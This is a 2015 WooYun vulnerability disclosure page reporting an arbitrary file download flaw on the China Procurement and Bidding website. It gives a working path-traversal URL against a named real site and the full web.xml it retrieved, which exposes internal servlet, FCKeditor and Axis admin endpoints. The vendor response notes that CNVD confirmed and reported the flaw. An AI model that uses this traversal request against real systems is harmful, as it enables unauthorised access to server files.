当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118646

漏洞标题:中国采购与招标网主站任意文件下载

相关厂商:中国采购与招标网

漏洞作者: 路人甲

提交时间:2015-06-09 11:33

修复时间:2015-07-24 13:56

公开时间:2015-07-24 13:56

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

一组下载

详细说明:

http://www.chinabidding.com.cn/download/download_file.jsp?record_id=4231669&filename=web.xml&filepath=../../../WEB-INF


2.jpg

1.jpg


<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app>
	<!-- 公用 开始-->
	<servlet>
		<servlet-name>TemplateLoad</servlet-name>
		<servlet-class>com.cbl.lib.InitTemplateServlet</servlet-class>
		<init-param>
			<param-name>templates.path</param-name>
			<param-value>WEB-INF/conf/templates.properties</param-value>
		</init-param>
		<load-on-startup>1</load-on-startup>
	</servlet>
	<servlet-mapping>
		<servlet-name>TemplateLoad</servlet-name>
		<url-pattern>/TemplateLoad</url-pattern>
	</servlet-mapping>
	<servlet servlet-name='MapDataServlet'
		servlet-class='jbs.runat.MapDataServlet'>
		<load-on-startup>2</load-on-startup>
	</servlet>
<!-- 
	<servlet servlet-name='RepairLoginoutServlet'
		servlet-class='jbs.listener.RepairLoginoutServlet'>
		<load-on-startup>3</load-on-startup>
	</servlet>
-->
	<directory-servlet>none</directory-servlet>
	<!-- 公用 结束-->
	<!-- 前台用 开始-->
	<taglib>
		<taglib-uri>oscache</taglib-uri>
		<taglib-location>/WEB-INF/classes/oscache.tld</taglib-location>
	</taglib>
	
	<servlet>
		<servlet-name>ImgServlet</servlet-name>
		<servlet-class>jbs.image.ImgServlet</servlet-class>
    </servlet>
   <servlet-mapping>
		<servlet-name>ImgServlet</servlet-name>
		<url-pattern>/zbw/zbxx/images/79.jpg</url-pattern>
   </servlet-mapping>
	<servlet>
		<servlet-name>FbcgxxServlet</servlet-name>
		<servlet-class>jbs.image.FbcgxxServlet</servlet-class>
    </servlet>
   <servlet-mapping>
		<servlet-name>FbcgxxServlet</servlet-name>
		<url-pattern>/zbw/images/lk.jpg</url-pattern>
   </servlet-mapping>
	<servlet>
		<servlet-name>RegServlet</servlet-name>
		<servlet-class>jbs.image.RegServlet</servlet-class>
    </servlet>
   <servlet-mapping>
		<servlet-name>RegServlet</servlet-name>
		<url-pattern>/zbw/member/images/register_27.jpg</url-pattern>
   </servlet-mapping>
	<servlet>
		<servlet-name>XmlServlet</servlet-name>
		<servlet-class>jbs.runat.CreateXmlServlet</servlet-class>
    </servlet>
   <servlet-mapping>
		<servlet-name>XmlServlet</servlet-name>
		<url-pattern>/xml/manualCreateXml</url-pattern>
   </servlet-mapping>
	<servlet>
		<servlet-name>MailServlet</servlet-name>
		<servlet-class>jbs.runat.KfzxInfoAutoSentndServlet</servlet-class>
    </servlet>
   <servlet-mapping>
		<servlet-name>MailServlet</servlet-name>
		<url-pattern>/zbw/sentmail</url-pattern>
   </servlet-mapping>
	<!-- Axis Web-Service Configuration Start -->
    
  <servlet>
    <servlet-name>AxisServlet</servlet-name>
    <display-name>Apache-Axis Servlet</display-name>
    <servlet-class>
        org.apache.axis.transport.http.AxisServlet
    </servlet-class>
  </servlet>
  <servlet>
    <servlet-name>AdminServlet</servlet-name>
    <display-name>Axis Admin Servlet</display-name>
    <servlet-class>
        org.apache.axis.transport.http.AdminServlet
    </servlet-class>
    <load-on-startup>100</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>SOAPMonitorService</servlet-name>
    <display-name>SOAPMonitorService</display-name>
    <servlet-class>
        org.apache.axis.monitor.SOAPMonitorService
    </servlet-class>
    <init-param>
      <param-name>SOAPMonitorPort</param-name>
      <param-value>5001</param-value>
    </init-param>
    <load-on-startup>100</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>AxisServlet</servlet-name>
    <url-pattern>/servlet/AxisServlet</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>AxisServlet</servlet-name>
    <url-pattern>*.jws</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>AxisServlet</servlet-name>
    <url-pattern>/services/*</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>SOAPMonitorService</servlet-name>
    <url-pattern>/SOAPMonitor</url-pattern>
  </servlet-mapping>
 <!-- uncomment this if you want the admin servlet -->
 <!--
  <servlet-mapping>
    <servlet-name>AdminServlet</servlet-name>
    <url-pattern>/servlet/AdminServlet</url-pattern>
  </servlet-mapping>
 -->
    <session-config>
        <!-- Default to 5 minute session timeouts -->
        <session-timeout>1</session-timeout>
    </session-config>
 <!--
    <listener>    
        <listener-class>    
            jbs.listener.OnlineCounterListener    
        </listener-class>    
    </listener>
 -->
    <!-- currently the W3C havent settled on a media type for WSDL;
    http://www.w3.org/TR/2003/WD-wsdl12-20030303/#ietf-draft
    for now we go with the basic 'it's XML' response -->
  <mime-mapping>
    <extension>wsdl</extension>
     <mime-type>text/xml</mime-type>
  </mime-mapping>
  
  <mime-mapping>
    <extension>xsd</extension>
    <mime-type>text/xml</mime-type>
  </mime-mapping>
  <welcome-file-list id="WelcomeFileList">
    <welcome-file>index.jsp</welcome-file>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.jws</welcome-file>
  </welcome-file-list>
  <!-- Axis Web-Service Configuration End --> 
	<!-- 前台用 结束-->
	<!-- 后台用 开始-->
  
	<servlet>
		<servlet-name>Connector</servlet-name>
		<servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
		<init-param>
			<param-name>baseDir</param-name>
			<param-value>/paihang_images/</param-value>
		</init-param>
		<init-param>
			<param-name>debug</param-name>
			<param-value>false</param-value>
		</init-param>
		<init-param>
			<param-name>AllowedExtensionsFile</param-name>
			<param-value>|jpg|gif|jpeg|png|bmp|swf|</param-value>
		</init-param>
		<init-param>
			<param-name>DeniedExtensionsFile</param-name>
			<param-value></param-value>
		</init-param>
		<load-on-startup>1</load-on-startup>
	</servlet>
  <servlet-mapping>
    <servlet-name>Connector</servlet-name>
    <url-pattern>/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
  </servlet-mapping>
	<filter>
		<filter-name>permission</filter-name>
		<filter-class>com.cbl.lib.Permission</filter-class>
	</filter>
	<filter-mapping>
		<filter-name>permission</filter-name>
		<url-pattern>/info/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>permission</filter-name>
		<url-pattern>/provider/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>permission</filter-name>
		<url-pattern>/association/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>permission</filter-name>
		<url-pattern>/right/*</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>permission</filter-name>
		<url-pattern>/sysmanage/*</url-pattern>
	</filter-mapping>
	<servlet>
		<servlet-name>CreateAttentionHtmlServlet</servlet-name>
		<servlet-class>jbs.runat.CreateAttentionHtmlServlet</servlet-class>
	</servlet>
		<servlet-mapping>
		<servlet-name>CreateAttentionHtmlServlet</servlet-name>
		<url-pattern>/CreateAttentionHtmlServlet</url-pattern>
	</servlet-mapping>
	
	<!-- 所有后台任务需在23:00~01:00间执行完毕-->
	<servlet servlet-name='userTask'
		servlet-class='jbs.runat.userTask'>
		<run-at>23:50</run-at>
	</servlet>
	<!-- 所有后台任务需在23:00~01:00间执行完毕-->
	<!-- 后台用 结束-->
</web-app>
文件没有发现!

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-09 13:55

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无

漏洞评价:

评论